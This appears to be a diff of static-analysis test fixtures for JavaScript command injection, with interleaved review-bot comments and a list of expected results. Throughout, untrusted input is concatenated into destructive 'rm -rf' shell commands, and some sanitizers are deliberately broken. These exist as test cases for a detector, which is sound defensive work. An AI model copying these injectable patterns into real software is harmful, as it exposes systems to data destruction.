cp.exec(util.format("for foo in (%s) do bar end", name)); // OK
cp.exec(require("printf")('rm -rf %s', name)); // NOT OK
}
module.exports.valid = function (name) {
cp.exec("rm -rf " + name); // NOT OK
if (!isValidName(name)) {
return;
}
cp.exec("rm -rf " + name); // OK
}
module.exports.safe = function (name) {
cp.exec("rm -rf " + name); // NOT OK
if (!isSafeName(name)) {
return;
}
cp.exec("rm -rf " + name); // OK
}
class Cla4 {
wha(name) {
cp.exec("rm -rf " + name); // NOT OK
}
static bla(name) {
cp.exec("rm -rf " + name); // OK - not exported
}
constructor(name) {
cp.exec("rm -rf " + name); // OK - not exported
}
}
module.exports.cla4 = new Cla4();
function Cla5(name) {
cp.exec("rm -rf " + name); // OK - not exported
}
module.exports.cla5 = new Cla5();
module.exports.indirect = function (name) {
let cmd = "rm -rf " + name; // NOT OK
let sh = "sh";
let args = ["-c", cmd];
cp.spawn(sh, args, cb);
}
module.exports.indirect2 = function (name) {
let cmd = name;
let sh = "sh";
let args = ["-c", cmd];
cp.spawn(sh, args, cb); // OK
let cmd2 = "rm -rf " + name;
var args2 = [cmd2];
cp.spawn(
'cmd.exe',
['/C', editor].concat(args2),
{ stdio: 'inherit' }
);
}
module.exports.cmd = function (command, name) {
cp.exec("fo | " + command); // OK
cp.exec("fo | " + name); // NOT OK
}
module.exports.sanitizer = function (name) {
var sanitized = "'" + name.replace(/'/g, "'\\''") + "'"
cp.exec("rm -rf " + sanitized); // OK
var broken = "'" + name.replace(/'/g, "'\''") + "'"
cp.exec("rm -rf " + broken); // NOT OK
}
var path = require("path");
module.exports.guard = function (name) {
cp.exec("rm -rf " + name); // NOT OK
if (!path.exist(name)) {
cp.exec("rm -rf " + name); // NOT OK
return;
}
cp.exec("rm -rf " + name); // OK
}
module.exports.blacklistOfChars = function (name) {
cp.exec("rm -rf " + name); // NOT OK
if (/[^A-Za-z0-9_\/:=-]/.test(name)) {
cp.exec("rm -rf " + name); // NOT OK
} else {
cp.exec("rm -rf " + name); // OK
}
}
module.exports.whitelistOfChars = function (name) {
cp.exec("rm -rf " + name); // NOT OK
if (/^[A-Za-z0-9_\/:=-]$/.test(name)) {
cp.exec("rm -rf " + name); // OK
} else {
cp.exec("rm -rf " + name); // NOT OK
}
}
module.exports.blackList2 = function (name) {
cp.exec("rm -rf " + name); // NOT OK
if (!/^([a-zA-Z0-9]+))?$/.test(name)) {
cp.exec("rm -rf " + name); // NOT OK
process.exit(-1);
}
cp.exec("rm -rf " + name); // OK - but FP due to tracking flow through `process.exit()`. [INCONSISTENCY]
}
module.exports.accessSync = function (name) {
cp.exec("rm -rf " + name); // NOT OK
try {
path.accessSync(name);
} catch (e) {
return;
}
cp.exec("rm -rf " + name); // OK - but FP due to `path.accessSync` not being recognized as a sanitizer. [INCONSISTENCY]
}
var cleanInput = function (s) {
if (/[^A-Za-z0-9_\/:=-]/.test(s)) {
s = "'" + s.replace(/'/g, "'\\''") + "'";
s = s.replace(/^(?:'')+/g, '') // unduplicate single-quote at the beginning
.replace(/\\'''/g, "\\'"); // remove non-escaped single-quote if there are enclosed between 2 escaped
}
return s;
}
module.exports.goodSanitizer = function (name) {
cp.exec("rm -rf " + name); // NOT OK
var cleaned = cleanInput(name);
cp.exec("rm -rf " + cleaned); // OK
}
var fs = require("fs");
module.exports.guard2 = function (name) {
cp.exec("rm -rf " + name); // NOT OK
if (!fs.existsSync("prefix/" + name)) {
cp.exec("rm -rf prefix/" + name); // NOT OK
return;
}
cp.exec("rm -rf prefix/" + name); // OK
}
module.exports.sanitizerProperty = function (obj) {
cp.exec("rm -rf " + obj.version); // NOT OK
obj.version = "";
cp.exec("rm -rf " + obj.version); // OK
}
module.exports.Foo = class Foo {
start(opts) {
cp.exec("rm -rf " + opts.bla); // NOT OK
this.opts = {};
this.opts.bla = opts.bla
cp.exec("rm -rf " + this.opts.bla); // NOT OK
}
}
function sanitizeShellString(str) {
let result = str;
result = result.replace(/>/g, "");
result = result.replace(/</g, "");
result = result.replace(/\*/g, "");
result = result.replace(/\?/g, "");
result = result.replace(/\[/g, "");
result = result.replace(/\]/g, "");
result = result.replace(/\|/g, "");
result = result.replace(/\`/g, "");
result = result.replace(/$/g, "");
result = result.replace(/;/g, "");
result = result.replace(/&/g, "");
result = result.replace(/\)/g, "");
result = result.replace(/\(/g, "");
result = result.replace(/\$/g, "");
result = result.replace(/#/g, "");
result = result.replace(/\\/g, "");
result = result.replace(/\n/g, "");
return result
}
module.exports.sanitizer2 = function (name) {
cp.exec("rm -rf " + name); // NOT OK
var sanitized = sanitizeShellString(name);
cp.exec("rm -rf " + sanitized); // OK
}
module.exports.typeofcheck = function (name) {
cp.exec("rm -rf " + name); // NOT OK
if (typeof name === "undefined") {
cp.exec("rm -rf " + name); // OK
} else {
cp.exec("rm -rf " + name); // NOT OK
}
}
module.exports.typeofcheck = function (arg) {
var cmd = "MyWindowCommand | findstr /i /c:" + arg; // NOT OK
cp.exec(cmd);
}
function id(x) {
return x;
}
module.exports.id = id;
module.exports.unproblematic = function() {
cp.exec("rm -rf " + id("test")); // OK
};
module.exports.problematic = function(n) {
cp.exec("rm -rf " + id(n)); // NOT OK
};
module.exports.typeofNumber = function(n) {
if (typeof n === "number") {
cp.exec("rm -rf " + n); // OK
}
};
function boundProblem(safe, unsafe) {
cp.exec("rm -rf " + safe); // OK
cp.exec("rm -rf " + unsafe); // NOT OK
}
Object.defineProperty(module.exports, "boundProblem", {
get: function () {
return boundProblem.bind(this, "safe");
}
});
function MyTrainer(opts) {
this.learn_args = opts.learn_args
}
MyTrainer.prototype = {
train: function() {
var command = "learn " + this.learn_args + " " + model; // NOT OK
cp.exec(command);
}
};
module.exports.MyTrainer = MyTrainer;
function yetAnohterSanitizer(str) {
const s = str || '';
let result = '';
for (let i = 0; i <= 2000; i++) {
if (!(s[i] === undefined ||
s[i] === '>' ||
s[i] === '<' ||
s[i] === '*' ||
s[i] === '?' ||
s[i] === '[' ||
s[i] === ']' ||
s[i] === '|' ||
s[i] === '˚' ||
s[i] === '$' ||
s[i] === ';' ||
s[i] === '&' ||
s[i] === '(' ||
s[i] === ')' ||
s[i] === ']' ||
s[i] === '#' ||
s[i] === '\\' ||
s[i] === '\t' ||
s[i] === '\n' ||
s[i] === '\'' ||
s[i] === '`' ||
s[i] === '"')) {
result = result + s[i];
}
}
return result;
}
module.exports.sanitizer3 = function (name) {
cp.exec("rm -rf " + name); // NOT OK
var sanitized = yetAnohterSanitizer(name);
cp.exec("rm -rf " + sanitized); // OK
}
const cp = require("child_process");
const spawn = cp.spawn;
module.exports.shellOption = function (name) {
cp.exec("rm -rf " + name); // NOT OK
cp.execFile("rm", ["-rf", name], {shell: true}, (err, out) => {}); // NOT OK
cp.spawn("rm", ["-rf", name], {shell: true}); // NOT OK
cp.execFileSync("rm", ["-rf", name], {shell: true}); // NOT OK
cp.spawnSync("rm", ["-rf", name], {shell: true}); // NOT OK
const SPAWN_OPT = {shell: true};
spawn("rm", ["first", name], SPAWN_OPT); // NOT OK
var arr = [];
arr.push(name); // NOT OK
spawn("rm", arr, SPAWN_OPT);
spawn("rm", build("node", (name ? name + ':' : '') + '-'), SPAWN_OPT); // This is bad, but the alert location is down in `build`.
}
function build(first, last) {
var arr = [];
if (something() === 'gm')
arr.push('convert');
first && arr.push(first);
last && arr.push(last); // NOT OK
return arr;
};
var asyncExec = require("async-execute");
module.exports.asyncStuff = function (name) {
asyncExec("rm -rf " + name); // NOT OK
}
const myFuncs = {
myFunc: function (name) {
asyncExec("rm -rf " + name); // NOT OK
}
};
module.exports.blabity = {};
Object.defineProperties(
module.exports.blabity,
Object.assign(
{},
Object.entries(myFuncs).reduce(
(props, [ key, value ]) => Object.assign(
props,
{
[key]: {
value,
configurable: true,
},
},
),
{}
)
)
);
const path = require('path');
const {promisify} = require('util');
const exec = promisify(require('child_process').exec);
module.exports = function check(config) {
const cmd = path.join(config.installedPath, 'myBinary -v'); // NOT OK
return exec(cmd);
}
module.exports.splitConcat = function (name) {
let args = ' my name is ' + name; // NOT OK
let cmd = 'echo';
cp.exec(cmd + args);
}
module.exports.myCommand = function (myCommand) {
let cmd = `cd ${cwd} ; ${myCommand}`; // OK - the parameter name suggests that it is purposely a shell command.
cp.exec(cmd);
}
(function () {
var MyThing = {
cp: require('child_process')
};
module.exports.myIndirectThing = function (name) {
MyThing.cp.exec("rm -rf " + name); // NOT OK
}
});
var imp = require('./isImported');
for (var name in imp){
module.exports[name] = imp[name];
}
module.exports.sanitizer4 = function (name) {
cp.exec("rm -rf " + name); // NOT OK
if (isNaN(name)) {
cp.exec("rm -rf " + name); // NOT OK
} else {
cp.exec("rm -rf " + name); // OK
}
if (isNaN(parseInt(name))) {
cp.exec("rm -rf " + name); // NOT OK
} else {
cp.exec("rm -rf " + name); // OK
}
if (isNaN(+name)) {
cp.exec("rm -rf " + name); // NOT OK
} else {
cp.exec("rm -rf " + name); // OK
}
if (isNaN(parseInt(name, 10))) {
cp.exec("rm -rf " + name); // NOT OK
} else {
cp.exec("rm -rf " + name); // OK
}
if (isNaN(name - 0)) {
cp.exec("rm -rf " + name); // NOT OK
} else {
cp.exec("rm -rf " + name); // OK
}
if (isNaN(name | 0)) { // <- not a sanitizer
cp.exec("rm -rf " + name); // NOT OK
} else {
cp.exec("rm -rf " + name); // NOT OK
}
}


@@ -0,0 +1,9 @@
var cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // NOT OK - is imported from main module.
};
module.exports.foo = function (name) {
cp.exec("rm -rf " + name); // NOT OK - is imported from main module.
};


@@ -0,0 +1,5 @@
var cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // OK, is not exported to a main-module.
};


@@ -0,0 +1,6 @@
// this file is imported from `index.js`.
define(function (require) {
return {
amdSub: require("./amdSub"),
};
});


@@ -0,0 +1,5 @@
const cp = require("child_process");
module.exports = function (name) {
cp.exec("rm -rf " + name); // NOT OK - this function is exported from `amd.js`
};


@@ -0,0 +1,15 @@
var cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged.
};
module.exports.foo = function (name) {
cp.exec("rm -rf " + name); // NOT OK - this is being called explicitly from child_process-test.js
};
module.exports.amd = require("./amd.js");
module.exports.arrToShell = function (cmd, arr) {
cp.spawn("echo", arr, {shell: true}); // NOT OK
}
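Review bot: The `cmd` parameter of `arrToShell` is never used — the spawned program is hard-coded to `"echo"` and only `arr` reaches the `{shell: true}` call — so the unused first parameter obscures which argument the `// NOT OK` marker refers to. Dropping it keeps the fixture honest about the tainted input: `module.exports.arrToShell = function (arr) {`. The assignment also lacks the trailing semicolon that the sibling exports in this file end with (`};`), which is a small consistency nit.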


@@ -0,0 +1,5 @@
var cp = require("child_process")
export default function (name) {
cp.exec("rm -rf " + name); // NOT OK - the "files" directory points to this file.
}


@@ -0,0 +1,5 @@
var cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // NOT OK - the "files" directory points to this file.
};


@@ -0,0 +1,5 @@
var cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged.
};


@@ -0,0 +1,8 @@
const dispatch = {
GET: require("./bla"),
POST: require("./subsub"),
};
module.exports.foo = function (name, type) {
dispatch[type](name);
};
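Review bot: The `dispatch[type](name)` call in `foo` carries no `// OK` / `// NOT OK` marker, unlike every other fixture in this commit, so a reader cannot tell what outcome the test expects from a call reached through a computed-key lookup. Since the `cp.exec` sinks presumably live in the required `./bla` and `./subsub` modules rather than here, a comment stating that would make the intent explicit: `dispatch[type](name); // call site only - the flagged cp.exec sinks are in ./bla and ./subsub`. The file names on this page are not shown, so confirm which files those requires resolve to before wording the comment.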


@@ -0,0 +1,5 @@
const cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged.
};


@@ -0,0 +1,166 @@
var express = require('express');
var child_process = require('child_process');
var execSync = child_process.execSync;
var exec = child_process.exec;
var spawn = child_process.spawn;
var spawnSync = child_process.spawnSync;
var fs = require('fs');
var app = express();
exec("cat foo/bar", function (err, out) {}); // NOT OK
exec("cat /proc/" + id + "/status", function (err, out) { // NOT OK
console.log(out);
});
execSync('cat /proc/cpuinfo').toString(); // NOT OK.
execSync(`cat ${newpath}`) // NOT OK
execSync('cat package.json | wc -l'); // OK - pipes!
execSync('cat /proc/cpuinfo /foo/bar').toString(); // OK multiple files.
execSync(`cat ${newpath} /foo/bar`).toString(); // OK multiple files.
exec(`cat ${newpath} | grep foo`, function (err, out) { }) // OK - pipes
execSync(`cat ${newpath}`, {uid: 1000}) // OK - non trivial options
exec('cat *.js | wc -l', { cwd: './' }, function (err, out) { }); // OK - wildcard and pipes
execSync(`cat foo/bar/${newpath}`); // NOT OK ("encoding" is used EXACTLY the same way in fs.readFileSync)
execSync(`cat foo/bar/${newpath}`, {encoding: 'utf8'}); // NOT OK ("encoding" is used EXACTLY the same way in fs.readFileSync)
execSync("/bin/cat /proc/cpuinfo", { uid: 1000, gid: 1000, encoding: 'utf8'}); // OK (fs.readFileSync cannot emulate uid / gid))
execSync('cat /proc/cpuinfo > foo/bar/baz').toString(); // OK.
execSync(`cat ${newpath} > ${destpath}`).toString(); // OK.
execSync(`cat ${files.join(' ')} > ${outFile}`); // OK
execSync(`cat ${files.join(' ')}`); // OK - but flagged - not just a simple file read [INCONSISTENCY]
exec("cat /proc/cpuinfo | grep name"); // OK - pipes
execSync(`cat ${newpath} | ${othertool}`); // OK - pipes
function cat(file) {
return execSync('cat ' + file).toString(); // NOT OK
}
execSync("sh -c 'cat " + newpath + "'"); // NOT OK - but not flagged [INCONSISTENCY]
var execFile = child_process.execFile;
var execFileSync = child_process.execFileSync;
execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // NOT OK
// Not using stderr
console.log(stdout);
});
execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // OK. - stderr is used.
console.log(stderr);
});
execFile('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}, function(error, stdout, stderr ) { // NOT OK
// Not using stderr
console.log(stdout);
});
execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}); // NOT OK
execFileSync('/bin/cat', [ 'pom.xml' ]); // NOT OK
var opts = {encoding: 'utf8'};
execFileSync('/bin/cat', [ 'pom.xml' ], opts); // NOT OK
var anOptsFileNameThatIsTooLongToBePrintedByToString = {encoding: 'utf8'};
execFileSync('/bin/cat', [ 'pom.xml' ], anOptsFileNameThatIsTooLongToBePrintedByToString); // NOT OK
execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'someEncodingValueThatIsCompletelyBogusAndTooLongForToString'}); // NOT OK
execFileSync('/bin/cat', [ "foo/" + newPath + "bar" ], {encoding: 'utf8'}); // NOT OK
execSync('cat /proc/cpuinfo' + foo).toString(); // NOT OK.
execFileSync('/bin/cat', [ `foo/bar/${newpath}` ]); // NOT OK
execFileSync('node', [ `foo/bar/${newpath}` ]); // OK - not a call to cat
exec("cat foo/bar", function (err, out) {}); // NOT OK
exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK
exec("cat foo/bar", (err, out) => doSomethingWith(out)); // NOT OK
execFileSync('/bin/cat', [ 'pom.xml' ], unknownOptions); // OK - unknown options.
exec("node foo/bar", (err, out) => doSomethingWith(out)); // OK - Not a call to cat
execFileSync('node', [ `cat` ]); // OK - not a call to cat
exec("cat foo/bar&", function (err, out) {}); // OK - contains &
exec("cat foo/bar,", function (err, out) {}); // OK - contains ,
exec("cat foo/bar$", function (err, out) {}); // OK - contains $
exec("cat foo/bar`", function (err, out) {}); // OK - contains `
spawn('cat', { stdio: ['pipe', stdin, 'inherit'] }); // OK - Non trivial use. (But weird API use.)
(function () {
const cat = spawn('cat', [filename]); // OK - non trivial use.
cat.stdout.on('data', (data) => {
res.write(data);
});
cat.stdout.on('end', () => res.end());
})();
var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK
var notDead = exec("cat foo/bar", (err, out) => {console.log(out)}); // OK
console.log(notDead);
(function () {
var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK
someCall(
exec("cat foo/bar", (err, out) => {console.log(out)}) // OK - non-trivial use of returned proccess.
);
return exec("cat foo/bar", (err, out) => {console.log(out)}); // OK - non-trivial use of returned proccess.
})();
const stdout2 = execSync('cat /etc/dnsmasq.conf', { // NOT OK.
encoding: 'utf8'
});
exec('/bin/cat', function (e, s) {}); // OK
spawn("cat") // OK
var shelljs = require("shelljs");
shelljs.exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK
shelljs.exec("cat foo/bar", {encoding: 'utf8'}); // NOT OK
shelljs.exec("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // NOT OK
let cspawn = require('cross-spawn');
cspawn('cat', ['foo/bar'], { encoding: 'utf8' }); // NOT OK
cspawn('cat', ['foo/bar'], { encoding: 'utf8' }, (err, out) => {console.log(out)}); // NOT OK
cspawn('cat', ['foo/bar'], (err, out) => {console.log(out)}); // NOT OK
cspawn('cat', ['foo/bar']); // NOT OK
cspawn('cat', (err, out) => {console.log(out)}); // OK
cspawn('cat', { encoding: 'utf8' }); // OK
let myResult = cspawn.sync('cat', ['foo/bar']); // NOT OK
let myResult = cspawn.sync('cat', ['foo/bar'], { encoding: 'utf8' }); // NOT OK
var execmod = require('exec');
execmod("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK
execmod("cat foo/bar", {encoding: 'utf8'}); // NOT OK
execmod("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // NOT OK
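Review bot: `let myResult` is declared twice at the top level of the same script (the two consecutive `cspawn.sync` lines), which is a SyntaxError in Node even though CodeQL's tolerant parser accepts it, so the fixture would not actually run; rename the second one, e.g. `let myResult2 = cspawn.sync('cat', ['foo/bar'], { encoding: 'utf8' }); // NOT OK`. The line `exec("cat foo/bar", function (err, out) {}); // NOT OK` also appears twice verbatim near the top and in the middle of the file, which only duplicates an expected alert without testing anything new. The `[INCONSISTENCY]` markers on the `files.join(' ')` and `sh -c` lines are useful, but the comment on the former says "OK - but flagged" while the latter says "NOT OK - but not flagged"; a one-line header comment stating that `[INCONSISTENCY]` means "known false positive/negative, intentionally kept" would make both readable without guessing.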


@@ -396,6 +396,614 @@
| autogenerated/NosqlAndSqlInjection/untyped/tst.js:8:11:8:19 | express() |
| autogenerated/NosqlAndSqlInjection/untyped/tst.js:9:1:11:2 | app.get ... "');\\n}) |
| autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:3:10:65 | db.get( ... + '"') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:1:10:1:33 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:2:12:2:26 | require('http') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:3:11:3:24 | require('url') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:14:64:2 | http.cr ... Y] \\n\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:38 | url.par ... , true) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:8:5:8:18 | cp.exec("foo") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:5:9:22 | cp.execSync("foo") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:5:10:22 | cp.execFile("foo") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:5:11:26 | cp.exec ... ("foo") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:5:12:19 | cp.spawn("foo") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:13:5:13:23 | cp.spawnSync("foo") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:14:5:14:18 | cp.fork("foo") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:5:17:16 | cp.exec(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:5:18:20 | cp.execSync(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:5:19:20 | cp.execFile(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:5:20:24 | cp.execFileSync(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:5:21:17 | cp.spawn(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:5:22:21 | cp.spawnSync(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:5:23:16 | cp.fork(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:25:5:25:32 | cp.exec ... "bar") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:5:28:32 | cp.exec ... : cmd}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:5:29:38 | cp.exec ... cmd}}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:5:30:30 | cp.exec ... : cmd}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:5:31:30 | cp.exec ... : cmd}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:5:32:30 | cp.exec ... : cmd}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:31 | cp.spaw ... cmd ]) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:5:44:34 | cp.exec ... , args) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:54:5:54:39 | cp.exec ... , args) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:5:56:59 | cp.spaw ... cmd])) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:58 | ['/C', ... , cmd]) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:5:57:50 | cp.spaw ... t(cmd)) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:49 | ['/C', ... at(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:5:60:26 | myArgs. ... + "c") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:5:61:20 | myArgs.push(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:5:62:39 | cp.exec ... , args) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:3:67:21 | cp.spawn(cmd, args) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:12:70:26 | require("util") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:1:76:2 | http.cr ... T OK\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:38 | url.par ... , true) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:27 | util.pr ... p.exec) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:32 | util.pr ... c)(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:26:79:54 | require ... erver') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:9:86:10 | app.use ... }) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:11:83:37 | cp.exec ... leName) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:31 | require ... b-lib") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:55 | require ... leName) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:1:95:2 | router. ... T OK\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:3:94:36 | cp.exec ... s.host) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:12:1:35 | require ... ocess') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:2:12:2:26 | require('http') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:3:11:3:24 | require('url') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:12:10:57 | cp.spaw ... ptions) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:1:16:2 | http.cr ... md);\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:38 | url.par ... , true) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:12:1:35 | require ... ocess') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:12:2:26 | require('http') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:11:3:24 | require('url') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:12:15:61 | cp.spaw ... ptions) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:1:21:2 | http.cr ... md);\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:38 | url.par ... , true) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:1:12:1:35 | require ... ocess') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:9:8:33 | process ... terate) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:36:14:48 | exec(command) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:1:17:15 | require('http') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:1:20:2 | require ... d]);\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:26 | require('url') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:47 | require ... , true) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:15:1:32 | require('express') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:2:15:2:31 | require('multer') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:3:14:3:41 | multer( ... ds/' }) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:5:11:5:19 | express() |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:6:12:6:35 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:1:10:2 | app.pos ... T OK\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:8:22:8:44 | upload. ... vatar') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:9:3:9:40 | exec("t ... alname) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:1:16:2 | app.pos ... })\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:28:12:53 | upload. ... s', 12) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:15:4 | req.fil ... OK\\n }) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:5:14:38 | exec("t ... alname) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:12:19:26 | require('http') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:14:20:30 | require('busboy') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:28:2 | http.cr ... oy);\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:28:15 | http.cr ... n(8000) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:3:26:4 | busboy. ... OK\\n }) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:5:25:29 | exec("t ... lename) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:3:27:18 | req.pipe(busboy) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:20:31:40 | require ... dable') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:1:43:2 | app.pos ... });\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:14:33:44 | formida ... true }) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:3:37:4 | form.pa ... OK\\n }) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:5:36:32 | exec("t ... s.name) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:3:42:4 | form2.p ... OK\\n }) |
